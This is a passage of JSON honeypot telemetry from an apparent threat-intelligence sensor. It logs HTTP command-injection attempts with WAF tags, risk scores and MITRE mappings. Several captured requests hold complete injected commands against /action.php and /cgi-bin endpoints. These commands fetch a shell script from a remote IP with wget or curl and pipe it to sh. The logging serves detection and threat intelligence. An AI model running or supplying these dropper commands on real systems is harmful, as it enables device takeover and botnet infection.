\/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":276},{"id":11860784,"ip":"45.156.87.213","ts":"2026-07-14 08:22:35.000000","proto":"tcp","src_port":60050,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/export-cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022300ab642a93228222cdb109780fc2f3ed2c05989\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 317, \u0022payload_entropy\u0022: 5.202136764039472, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002244975a8c148732922162b31805f6d2dc4dff1863\u0022, \u0022event_fingerprint\u0022: \u0022773081098d201d625268f301c49ea9db4068c7eb\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00227e34071e1808a616ee874baef74df782\u0022, \u0022path_pattern_hash\u0022: \u0022319aefac71fa65635eb60e229c574b1d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nCo\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nConnection: close\\r\\n\\r\\nsetCookie=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxsc;busybox wget http:\/\/91.92.40.118\/wget.sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nCo\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nConnection: close\\r\\n\\r\\nsetCookie=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxsc;busybox wget http:\/\/91.92.40.118\/wget.sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nCo\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002232352477885e22a47f36dd845bdcbf4ff81e42f5\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nCo\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/export-cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/export-cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nCo\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":317},{"id":11860785,"ip":"45.156.87.213","ts":"2026-07-14 08:22:35.000000","proto":"tcp","src_port":60062,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/remote_help-cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00224470cfe23acda62fbb5ae9d06314c68f4f66bdc0\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 316, \u0022payload_entropy\u0022: 5.224100722101093, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002244975a8c148732922162b31805f6d2dc4dff1863\u0022, \u0022event_fingerprint\u0022: \u0022858c3eda32855864a90aca10b3d3eecb19aec989\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226e4ee5d68213470b3c67a777df45d951\u0022, \u0022path_pattern_hash\u0022: \u0022081a0659a19fb0d32ca77af7f68355fe\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 16\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, 